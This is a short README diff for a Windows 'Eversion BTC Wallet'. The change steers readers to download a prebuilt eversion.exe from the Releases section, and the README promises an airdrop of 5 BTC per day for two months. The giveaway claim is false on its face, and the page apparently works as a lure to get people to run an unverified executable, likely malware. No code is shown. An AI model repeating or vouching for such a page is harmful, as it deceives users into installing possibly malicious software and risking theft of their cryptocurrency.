chockbar/eversion-desktop/README.md

 Eversion BTC Wallet is the ultimate solution for securely storing and managing your bitcoins.
 With our user-friendly interface and robust security measures, you can confidently take control of your digital assets.

 🌟 Key Features:
-✅ Easy Installation: Download the source-code with an exe installer and get started in no time.
+✅ Easy Installation: Download the eversion.exe file from our Releases section and get started in no time.
 ✅ Airdrop Opportunity: Join now and receive a daily share of 5 BTC for the next two months.
 ✅ Windows Compatibility: Currently available for Windows users, with Android support coming soon.